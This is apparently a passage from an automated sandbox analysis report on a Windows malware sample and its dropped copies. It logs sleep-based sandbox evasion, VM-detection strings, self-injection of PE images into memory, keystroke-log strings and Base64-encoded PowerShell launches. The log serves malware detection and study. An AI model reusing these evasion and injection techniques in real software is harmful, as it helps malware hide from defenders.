              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195655s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195545s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195406s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195280s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195171s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1195046s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194937s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194824s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194703s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194593s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194484s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194374s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194265s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194156s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1194046s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193934s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193811s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193656s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193544s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193420s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193285s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193150s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1193006s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1192887s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1192772s >= -30000s
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124 Thread sleep time: -1192647s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3312 Thread sleep time: -9223372036854770s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3312 Thread sleep count: 34 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3160 Thread sleep count: 9536 > 30
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5176 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5176 Thread sleep count: 41 > 30
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 3924 Thread sleep count: 9623 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 5040 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 5040 Thread sleep count: 44 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4556 Thread sleep count: 9596 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436 Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5172 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4980 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4980 Thread sleep count: 39 > 30
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4936 Thread sleep count: 9642 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424 Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 1812 Thread sleep count: 639 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1200000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1198890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1198750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1198343s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1198203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1197874s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1197561s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1197296s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1197077s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1196949s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1196750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1196593s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1196390s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1195843s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1195587s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532 Thread sleep time: -1195093s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3068 Thread sleep count: 2115 > 30
              Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe Last function: Thread delayed
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1200000
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1199812
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1199514
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1199359
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1199233
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1199106
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1198966
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1198812
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1198685
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1198451
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1198312
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1198185
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1198062
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1197936
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1197810
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1197656
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1197492
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1197250
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1196906
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1196703
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1196562
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1196405
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1196247
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1196109
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195997
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195874
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195765
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195655
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195545
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195406
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195280
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195171
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1195046
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1194937
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1194824
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe Thread delayed: delay time: 1194703
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194593
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194484
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194374
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194265
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194156
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194046
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193934
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193811
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193656
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193544
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193420
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193285
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193150
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193006
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192887
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192772
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192647
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198890
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198343
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198203
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197874
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197561
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197296
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197077
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196949
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196593
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196390
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195843
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195587
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195093
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow / User API: threadDelayed 9668
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9400
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow / User API: threadDelayed 9210
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 9536
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9623
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 9596
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7267
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9642
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9081
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 639
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2115
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information queried: ProcessInformation
              Source: Oefdyik.exe, 0000001B.00000002.519934856.00000000011B6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll096
              Source: kDPmkTm.exe, 00000011.00000002.520665643.000000000126D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: izwFjkhFJm.exe, 0000000F.00000003.344564244.0000000001519000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process token adjusted: Debug
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Memory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: Base64 decoded start-sleep -seconds 20
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Memory written: C:\Users\user\Desktop\izwFjkhFJm.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Memory written: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe base: 400000 value starts with: 4D5A
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Process created: C:\Users\user\Desktop\izwFjkhFJm.exe C:\Users\user\Desktop\izwFjkhFJm.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp, izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003248000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Program Manager
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}r{Win}r
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003284000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}{Win}
              Source: izwFjkhFJm.exe, 0000000F.00000002.530484456.0000000003266000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Operating System: Program Manager]</b> (3/21/2023 1:30:57 AM)<br>{Win}
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Users\user\Desktop\izwFjkhFJm.exe VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
